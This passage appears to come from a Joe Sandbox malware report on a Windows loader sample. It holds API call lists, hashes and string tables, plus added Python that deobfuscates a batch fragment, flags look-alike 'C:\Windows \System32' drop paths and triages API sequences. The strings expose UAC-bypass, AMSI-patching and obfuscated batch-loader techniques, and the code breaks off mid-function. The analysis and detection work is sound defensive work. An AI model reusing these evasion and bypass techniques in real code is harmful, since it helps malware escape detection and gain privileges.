• Sleep.KERNEL32(00001770,UacScan,02924344,028E8FEC,ScanString,02924344,028E8FEC,OpenSession,02924344,028E8FEC,ScanBuffer,02924344,028E8FEC,OpenSession,02924344,028E8FEC), ref: 028E3094
  • Part of subcall function 028DC368: RtlInitUnicodeString.N(?,?,00000000,028DC3E2), ref: 028DC390
  • Part of subcall function 028DC368: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,028DC3E2), ref: 028DC3A6
  • Part of subcall function 028DC368: NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,028DC3E2), ref: 028DC3C5
• WinExec.KERNEL32(00000000,028E953C), ref: 028E436D
Memory Dump Source
• Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
• Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
Similarity
• API ID: FilePath$NameName_$AddressAttributesCloseCreateDeleteExecHandleInitLibraryLoadModuleProcSleepStringUnicodeWrite
• String ID: .url$@echo offset "Nnqr=set "%Nnqr%"njyC=="%Nnqr%"qkMvMLsfma%njyC%http"%Nnqr%"dbvWEsxWns%njyC%rem "%Nnqr%"NpzRZtRBVV%njyC%Cloa"%Nnqr%"ftNVZzSZxa%njyC%/Bat"%Nnqr%"TwupSEtIWD%njyC%gith"%Nnqr%"yIGacXULig%njyC%k"%Nnqr%"uGlGnqCSun%njyC%h2sh"%Nnqr%"FU$C:\Users\Public\$C:\Users\Public\alpha.exe$C:\Windows \System32\NETUTILS.dll$C:\Windows \System32\aaa.bat$C:\Windows \System32\easinvoker.exe$C:\\Users\\Public\\Libraries\\$C:\\Windows\\System32\\extrac32.exe /C /Y $CO.bat$HotKey=$IconIndex=$Initialize$O.bat$OpenSession$ScanBuffer$ScanString$URL=file:"$UacInitialize$UacScan$[InternetShortcut]$er.e$s.d
• API String ID: 102611719-1347945576
• Opcode ID: 72104f17388f0843a71240446d9e311656015aeaffe312629b0b4bfe9513f614
• Instruction ID: 32170333865af8c01ef16150da6da2ea2ec518cde8ebb86ed4d88ab043c99684
• Opcode Fuzzy Hash: 72104f17388f0843a71240446d9e311656015aeaffe312629b0b4bfe9513f614
• Instruction Fuzzy Hash: 0E53EC3DA501699FEF60EB68D890EDD73B6AF45301F2044A9A009E7714DB70EE89CF52
Uniqueness
Uniqueness Score: -1.00%

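The String ID list of the function above carries two loader tricks worth pulling apart by hand. First, a batch script whose own `set` keyword and `=` sign are hidden behind environment variables: `set "Nnqr=set "` and `%Nnqr%"njyC=="` define them, and every later line is `%Nnqr%"NAME%njyC%VALUE"`, so the fragments (`http`, `rem `, `Cloa`, `/Bat`, `gith`, `k`, `h2sh`, ...) only become visible once each line is expanded before it is parsed. Second, drop paths under `C:\Windows \System32` (trailing space after `Windows`) for easinvoker.exe, NETUTILS.dll and aaa.bat, a directory that is distinct from the real one on disk but looks identical in most listings and logs. The Python below is an added example written for this page, not code from the report or from the sample. It assumes the batch lines were newline-separated before the sandbox flattened them into one string (the `@echo offset` run is read as `@echo off` followed by `set`), it models the batch-file rule that an undefined `%NAME%` expands to nothing, and the list of trusted directory names used for the look-alike check is a hand-picked assumption. The order in which the recovered fragments are later concatenated is not visible on the page, so the example stops at the variable table.

```python
import re

# Constructed input: the obfuscated batch fragment from the report's string
# table. The sandbox printed it as one flattened string; the line breaks here
# are an assumption about the original layout.
BATCH_FRAGMENT = '''@echo off
set "Nnqr=set "
%Nnqr%"njyC=="
%Nnqr%"qkMvMLsfma%njyC%http"
%Nnqr%"dbvWEsxWns%njyC%rem "
%Nnqr%"NpzRZtRBVV%njyC%Cloa"
%Nnqr%"ftNVZzSZxa%njyC%/Bat"
%Nnqr%"TwupSEtIWD%njyC%gith"
%Nnqr%"yIGacXULig%njyC%k"
%Nnqr%"uGlGnqCSun%njyC%h2sh"
'''

# Constructed input: drop paths taken from the same string table, plus the
# genuine extrac32 path for contrast.
DROPPED_PATHS = [
    r"C:\Users\Public\alpha.exe",
    r"C:\Windows \System32\NETUTILS.dll",
    r"C:\Windows \System32\aaa.bat",
    r"C:\Windows \System32\easinvoker.exe",
    r"C:\Windows\System32\extrac32.exe",
]

VAR_REF = re.compile(r"%([^%\s]+)%")
# Quoted form  set "NAME=VALUE": cmd.exe strips the outer quotes and keeps
# inner spaces, which is how the script stores 'set ' and 'rem ' intact.
SET_QUOTED = re.compile(r'^set\s+"([^=\s]+)=(.*)"\s*$', re.IGNORECASE)


def expand_percent_vars(line, env):
    """Expand %NAME% the way cmd.exe does for a line of a batch file: known
    names are substituted, unknown names expand to the empty string."""
    return VAR_REF.sub(lambda m: env.get(m.group(1), ""), line)


def deobfuscate_batch(script):
    """Process the script line by line. Each line is expanded with the
    variables defined so far *before* it is parsed, so the 'set' and '='
    hidden behind %Nnqr% and %njyC% are recovered and later assignments are
    read as plain  set "NAME=VALUE". Returns (variable table, readable lines)."""
    env = {}
    readable = []
    for raw in script.splitlines():
        line = expand_percent_vars(raw.strip(), env)
        readable.append(line)
        m = SET_QUOTED.match(line)
        if m:
            env[m.group(1)] = m.group(2)
    return env, readable


# Directory names whose whitespace look-alikes are worth flagging. This short
# list is an assumption for the example, not something the report states.
TRUSTED_DIR_NAMES = {"windows", "system32", "syswow64", "program files"}


def mock_trusted_dir_components(path):
    """Return the components of a path that spell a trusted directory name
    followed by trailing whitespace ('Windows ' in 'C:\\Windows \\System32').
    Such a directory is a different object on disk from the real one, yet it
    prints almost identically, which is the point of the trick."""
    return [
        part for part in path.split("\\")
        if part != part.rstrip() and part.rstrip().lower() in TRUSTED_DIR_NAMES
    ]


def find_mock_trusted_paths(paths):
    """Filter a list of paths down to those that use a look-alike directory."""
    return [p for p in paths if mock_trusted_dir_components(p)]


if __name__ == "__main__":
    table, lines = deobfuscate_batch(BATCH_FRAGMENT)
    print("\n".join(lines))
    for name, value in table.items():
        print(f"{name:>12} = {value!r}")
    for p in find_mock_trusted_paths(DROPPED_PATHS):
        print("look-alike directory:", p, mock_trusted_dir_components(p))
```

Running the script prints the de-aliased `set "NAME=VALUE"` lines and the recovered table (`Nnqr` is `set `, `njyC` is `=`, then `http`, `rem `, `Cloa`, `/Bat`, `gith`, `k`, `h2sh` under their random names), and flags the three `C:\Windows \System32` paths while leaving the genuine `C:\Windows\System32\extrac32.exe` alone. The trailing-space check is the part worth carrying into detection logic: a plain string match on `System32` or `Windows` passes both paths, so the comparison has to look at each path component for whitespace that the real directory name does not have.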
Control-flow Graph
[Graph image omitted; legend: Executed / Not Executed. The rendered graph covers the function body from 028E4EFE to 028E8B96 (entry node 10531). The only API calls on its node labels are WinExec, RtlMoveMemory, GetCurrentProcess, EnumSystemLocalesA and ExitProcess; the remaining edges are calls to internal routines such as 028C4824, 028C4964, 028C4698, 028C47B0 and 028D7BE8.]
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 028D7BE8: LoadLibraryW.KERNEL32(?,00000000,028D7C9A), ref: 028D7C18
                                                                                                                                                                      • Part of subcall function 028D7BE8: GetModuleHandleW.KERNEL32(?,?,00000000,028D7C9A), ref: 028D7C1E
                                                                                                                                                                      • Part of subcall function 028D7BE8: GetProcAddress.KERNEL32(00000000,00000000), ref: 028D7C37
                                                                                                                                                                      • Part of subcall function 028DD318: RegOpenKeyA.ADVAPI32(?,00000000,02924798), ref: 028DD35C
                                                                                                                                                                      • Part of subcall function 028DD318: RegSetValueExA.ADVAPI32(00000874,00000000,00000000,00000001,00000000,0000001C,00000000,028DD3C7), ref: 028DD394
                                                                                                                                                                      • Part of subcall function 028DD318: RegCloseKey.ADVAPI32(00000874,00000874,00000000,00000000,00000001,00000000,0000001C,00000000,028DD3C7), ref: 028DD39F
                                                                                                                                                                    • WinExec.KERNEL32(00000000,00000000), ref: 028E57F9
                                                                                                                                                                      • Part of subcall function 028D9E70: CompareStringA.KERNEL32(00000400,00000001,00000000,?,00000000), ref: 028D9F33
                                                                                                                                                                    • RtlMoveMemory.N(00000000,?,00000000,?,ScanBuffer,02924344,028E8FEC,UacScan,02924344,028E8FEC,OpenSession,02924344,028E8FEC,OpenSession,02924344,028E8FEC), ref: 028E5D7B
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressCloseCompareExecHandleLibraryLoadMemoryModuleMoveOpenProcStringValue
                                                                                                                                                                    • String ID: C:\Users\Public\$C:\Windows\System32\$Initialize$OpenSession$ScanBuffer$ScanString$UacInitialize$UacScan
                                                                                                                                                                    • API String ID: 897696978-872072817
                                                                                                                                                                    • Opcode ID: cd85b16b4847b9e397fbeeeb84fdd3195d139880b98f1413495f4d48d129927d
                                                                                                                                                                    • Instruction ID: 0580eaa9a483b9f5ce7385b93de8ed50334e8a5f78e0f56fb7e397099ebc1159
                                                                                                                                                                    • Opcode Fuzzy Hash: cd85b16b4847b9e397fbeeeb84fdd3195d139880b98f1413495f4d48d129927d
                                                                                                                                                                    • Instruction Fuzzy Hash: 6A92F93CA441689FDF64EB68D890DDD73B6AB45300F2044A9A149E7724DBB0EEC9CF52
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    APIs
                                                                                                                                                                    • Sleep.KERNEL32(00000000,?,028C1FC1), ref: 028C17D0
                                                                                                                                                                    • Sleep.KERNEL32(0000000A,00000000,?,028C1FC1), ref: 028C17E6
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Sleep
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3472027048-0
                                                                                                                                                                    • Opcode ID: 2dd8311d14577caa8e4c2c2fe601f7d09d75edf8b5153ce8422bf6dc10a67b94
                                                                                                                                                                    • Instruction ID: 6cb58cccb0153ae22b1be1d4d0c5600a4cdceadf7cda96fc4053251865230e8c
                                                                                                                                                                    • Opcode Fuzzy Hash: 2dd8311d14577caa8e4c2c2fe601f7d09d75edf8b5153ce8422bf6dc10a67b94
                                                                                                                                                                    • Instruction Fuzzy Hash: 04B1F17EA092518BCB25CF28D4C8365BBE1EB84315F2986BDD44DCB287C770D469CB90
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32,00000000,00000000,028D7BA5,?,?,00000000,00000000), ref: 028D7B61
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,kernel32), ref: 028D7B67
                                                                                                                                                                    • VirtualProtect.KERNEL32(?,?,?,?,00000000,kernel32,00000000,00000000,028D7BA5,?,?,00000000,00000000), ref: 028D7B81
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                                    • String ID: irtualProtect$kernel32
                                                                                                                                                                    • API String ID: 2099061454-2063912171
                                                                                                                                                                    • Opcode ID: 9639d2a857fc1780c1e418e3d463d9e67c68a4feaf8395cf27c79b6cfde375d2
                                                                                                                                                                    • Instruction ID: 39bd036cb36ef8b4dcb0fa88686f9103e18070439120f45e4e4414df4e8dff5d
                                                                                                                                                                    • Opcode Fuzzy Hash: 9639d2a857fc1780c1e418e3d463d9e67c68a4feaf8395cf27c79b6cfde375d2
                                                                                                                                                                    • Instruction Fuzzy Hash: BE018F7C600248AFE700EFA8DC51E6EB7EDEB48710F614465F904E3740D774EA588A25
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    APIs
                                                                                                                                                                    • Sleep.KERNEL32(00000000,?,?,00000000,028C1FE4), ref: 028C1B17
                                                                                                                                                                    • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,028C1FE4), ref: 028C1B31
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Sleep
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3472027048-0
                                                                                                                                                                    • Opcode ID: 1d208d809b645fe27865e9cd346238eeaa0792b098e334e88a8f90c6caca7584
                                                                                                                                                                    • Instruction ID: cebbbb9bbb81cc847e1f94b3d7b97adf07589a444e7346bdd048c89b3c9d455b
                                                                                                                                                                    • Opcode Fuzzy Hash: 1d208d809b645fe27865e9cd346238eeaa0792b098e334e88a8f90c6caca7584
                                                                                                                                                                    • Instruction Fuzzy Hash: F251BC7D6052408FEB25CF6CC9C8766BBD4AB85314F2885AED44CCB287E770D459CBA1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    APIs
                                                                                                                                                                    • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 028DC9EA
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CheckConnectionInternet
                                                                                                                                                                    • String ID: Initialize$OpenSession$ScanBuffer
                                                                                                                                                                    • API String ID: 3847983778-3852638603
                                                                                                                                                                    • Opcode ID: 427f31927a265ab544b23a1a314d00a9546891961e9d1d5e4cf974deb9fc75b4
                                                                                                                                                                    • Instruction ID: cc826ca9440af663645841d591638d7ee23ae27c992d5ca671177d91ae61ab38
                                                                                                                                                                    • Opcode Fuzzy Hash: 427f31927a265ab544b23a1a314d00a9546891961e9d1d5e4cf974deb9fc75b4
                                                                                                                                                                    • Instruction Fuzzy Hash: 7941087DA502589BEB10EAA8C850EDEB3FAEF48700F21442AE001E7254DB74E949CB52
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,028D5D30,?,?,028D38BC,00000001), ref: 028D5C44
                                                                                                                                                                    • GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,028D5D30,?,?,028D38BC,00000001), ref: 028D5C72
                                                                                                                                                                      • Part of subcall function 028C7D18: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,028D38BC,028D5CB2,00000000,028D5D30,?,?,028D38BC), ref: 028C7D66
                                                                                                                                                                      • Part of subcall function 028C7F54: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,028D38BC,028D5CCD,00000000,028D5D30,?,?,028D38BC,00000001), ref: 028C7F73
                                                                                                                                                                    • GetLastError.KERNEL32(00000000,028D5D30,?,?,028D38BC,00000001), ref: 028D5CD7
                                                                                                                                                                      • Part of subcall function 028CA734: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,028CC395,00000000,028CC3EF), ref: 028CA753
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateErrorFileLast$FormatFullMessageNamePath
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 503785936-0
                                                                                                                                                                    • Opcode ID: b082ddc6c56bdeb17a71dd44f199b5cedaecc1080716e2f376d5593a32273224
                                                                                                                                                                    • Instruction ID: ac908e376e7601009ea644bb7498f58ed0750bd82450d194c7e78cd95e9ddc4c
                                                                                                                                                                    • Opcode Fuzzy Hash: b082ddc6c56bdeb17a71dd44f199b5cedaecc1080716e2f376d5593a32273224
                                                                                                                                                                    • Instruction Fuzzy Hash: 1B31797CA006185FEB00EFACC881B9DB7F6AF48314FA08469E504E7380D7799909CF66
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • RegOpenKeyA.ADVAPI32(?,00000000,02924798), ref: 028DD35C
                                                                                                                                                                    • RegSetValueExA.ADVAPI32(00000874,00000000,00000000,00000001,00000000,0000001C,00000000,028DD3C7), ref: 028DD394
                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000874,00000874,00000000,00000000,00000001,00000000,0000001C,00000000,028DD3C7), ref: 028DD39F
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                     • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseOpenValue
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 779948276-0
                                                                                                                                                                    • Opcode ID: e23bf62c629d75fb63a3d4dd2fb8f77c4957902be58d9bbd09a909529584edba
                                                                                                                                                                    • Instruction ID: c671f2e4cf120b47933ccc93d239550b5b56732fa40a5ad9f23e1014a0897456
                                                                                                                                                                    • Opcode Fuzzy Hash: e23bf62c629d75fb63a3d4dd2fb8f77c4957902be58d9bbd09a909529584edba
                                                                                                                                                                    • Instruction Fuzzy Hash: 8C116D7C600204AFEB04EFACC8919AE77FDEB49300F614428B418D7250E730ED888F51
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • RegOpenKeyA.ADVAPI32(?,00000000,02924798), ref: 028DD35C
                                                                                                                                                                    • RegSetValueExA.ADVAPI32(00000874,00000000,00000000,00000001,00000000,0000001C,00000000,028DD3C7), ref: 028DD394
                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000874,00000874,00000000,00000000,00000001,00000000,0000001C,00000000,028DD3C7), ref: 028DD39F
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                     • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseOpenValue
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 779948276-0
                                                                                                                                                                    • Opcode ID: 46278242def622b3ce59ac4d46a76ce09f29b375923983ca22db7c209fa860cf
                                                                                                                                                                    • Instruction ID: fbb94b5f2a4141ab92115537bfd3fa0312802e44f0e091cb26daa155ee185046
                                                                                                                                                                    • Opcode Fuzzy Hash: 46278242def622b3ce59ac4d46a76ce09f29b375923983ca22db7c209fa860cf
                                                                                                                                                                    • Instruction Fuzzy Hash: B9116D7C600204AFDB04EFACC8919AE77FDEB49300F614428B418D7250E730E9888F51
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • LoadLibraryW.KERNEL32(?,00000000,028D7C9A), ref: 028D7C18
                                                                                                                                                                    • GetModuleHandleW.KERNEL32(?,?,00000000,028D7C9A), ref: 028D7C1E
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 028D7C37
                                                                                                                                                                      • Part of subcall function 028D7B20: GetModuleHandleA.KERNEL32(kernel32,00000000,00000000,028D7BA5,?,?,00000000,00000000), ref: 028D7B61
                                                                                                                                                                      • Part of subcall function 028D7B20: GetProcAddress.KERNEL32(00000000,kernel32), ref: 028D7B67
                                                                                                                                                                      • Part of subcall function 028D7B20: VirtualProtect.KERNEL32(?,?,?,?,00000000,kernel32,00000000,00000000,028D7BA5,?,?,00000000,00000000), ref: 028D7B81
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                     • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressHandleModuleProc$LibraryLoadProtectVirtual
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2543409266-0
                                                                                                                                                                    • Opcode ID: 6b5f71244b27faaa1421261357136323a8b9043e8c4915ca26ee8b9796734c91
                                                                                                                                                                    • Instruction ID: 516ad03ead3eaf9672a8e5e1124bee89b8a8f1334a5874cbc113fc2daf99cbdc
                                                                                                                                                                    • Opcode Fuzzy Hash: 6b5f71244b27faaa1421261357136323a8b9043e8c4915ca26ee8b9796734c91
                                                                                                                                                                    • Instruction Fuzzy Hash: C101CC7C604214AFEB04EB68DE51B5E77B9EB48300F604478B515E3381DB34D9088F56
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%
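
The API lists in these function entries are what an analyst actually triages when a report runs to thousands of lines. The following Python is an added example for this page, not part of Joe Sandbox and not code from the sample under analysis: it parses entries in the text layout shown here (the "APIs" list, the key: value fields under "Similarity", the "Uniqueness Score" line) and flags two API sequences that appear in the entries above. A RegSetValueExA call is reported as a registry value write, with the dwType argument decoded when the sandbox captured it; GetProcAddress together with VirtualProtect in one function (subcalls included) is reported as runtime API resolution followed by a page-protection change, the combination a loader needs to patch code it has just located. The sample text is copied from two entries on this page; the tag names, the REG_* table and the rule set are the author's own assumptions and are triage hints for manual review, not verdicts.

```python
"""Parse Joe Sandbox function entries and flag API sequences worth a look.

Added example, not Joe Sandbox code. Rules are author heuristics (assumption).
"""
import re
from dataclasses import dataclass, field

# Constructed sample: two entries copied from the report, same layout, trimmed.
SAMPLE = """\
APIs
• RegOpenKeyA.ADVAPI32(?,00000000,02924798), ref: 028DD35C
• RegSetValueExA.ADVAPI32(00000874,00000000,00000000,00000001,00000000,0000001C,00000000,028DD3C7), ref: 028DD394
• RegCloseKey.ADVAPI32(00000874,00000874,00000000,00000000,00000001,00000000,0000001C,00000000,028DD3C7), ref: 028DD39F
Memory Dump Source
• Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
Similarity
• API ID: CloseOpenValue
• Opcode ID: e23bf62c629d75fb63a3d4dd2fb8f77c4957902be58d9bbd09a909529584edba
Uniqueness

Uniqueness Score: -1.00%

APIs
• LoadLibraryW.KERNEL32(?,00000000,028D7C9A), ref: 028D7C18
• GetModuleHandleW.KERNEL32(?,?,00000000,028D7C9A), ref: 028D7C1E
• GetProcAddress.KERNEL32(00000000,00000000), ref: 028D7C37
  • Part of subcall function 028D7B20: GetModuleHandleA.KERNEL32(kernel32,00000000,00000000,028D7BA5,?,?,00000000,00000000), ref: 028D7B61
  • Part of subcall function 028D7B20: GetProcAddress.KERNEL32(00000000,kernel32), ref: 028D7B67
  • Part of subcall function 028D7B20: VirtualProtect.KERNEL32(?,?,?,?,00000000,kernel32,00000000,00000000,028D7BA5,?,?,00000000,00000000), ref: 028D7B81
Similarity
• API ID: AddressHandleModuleProc$LibraryLoadProtectVirtual
• Opcode ID: 6b5f71244b27faaa1421261357136323a8b9043e8c4915ca26ee8b9796734c91
Uniqueness

Uniqueness Score: -1.00%
"""

# One API line: optional subcall prefix, Name.MODULE(args), ref: address
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<caller>[0-9A-F]+): )?"
    r"(?P<name>\w+)\.(?P<module>\w+)\((?P<args>.*)\), ref: (?P<ref>[0-9A-F]+)$")
SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin",
                   "Yara matches", "Similarity", "Uniqueness"}
# Registry value types as passed in dwType (assumed table, standard Win32 values)
REG_TYPES = {1: "REG_SZ", 2: "REG_EXPAND_SZ", 3: "REG_BINARY", 4: "REG_DWORD", 7: "REG_MULTI_SZ"}


@dataclass
class ApiCall:
    name: str
    module: str
    args: tuple
    ref: str
    caller: str = ""  # non-empty when the call was made from a subcall function


@dataclass
class FunctionEntry:
    apis: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)  # "API ID", "Opcode ID", ...


def parse_entries(text):
    """Split report text into FunctionEntry objects; an entry starts at 'APIs'."""
    entries, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur, section = FunctionEntry(), "APIs"
            entries.append(cur)
            continue
        if cur is None or not line:
            continue
        if line in SECTION_HEADERS:
            section = line
            continue
        if line.startswith("Uniqueness Score:"):
            cur.fields["Uniqueness Score"] = line.split(":", 1)[1].strip()
            continue
        body = line.lstrip("• ").strip()
        if section == "APIs":
            m = API_RE.match(body)
            if m:  # unparseable residue (e.g. page link text) is ignored
                cur.apis.append(ApiCall(m["name"], m["module"],
                                        tuple(m["args"].split(",")), m["ref"], m["caller"] or ""))
        elif ":" in body:
            key, _, val = body.partition(":")
            cur.fields[key.strip()] = val.strip()
    return entries


def _hex(s):
    try:
        return int(s, 16)
    except ValueError:  # '?' means the sandbox did not capture the argument
        return None


def triage(entry):
    """Return (tag, detail) findings for one entry; a hit means 'open it in IDA'."""
    names = [a.name for a in entry.apis]
    findings = []
    for call in entry.apis:
        if call.name.startswith("RegSetValueEx"):
            # RegSetValueEx(hKey, lpValueName, Reserved, dwType, lpData, cbData)
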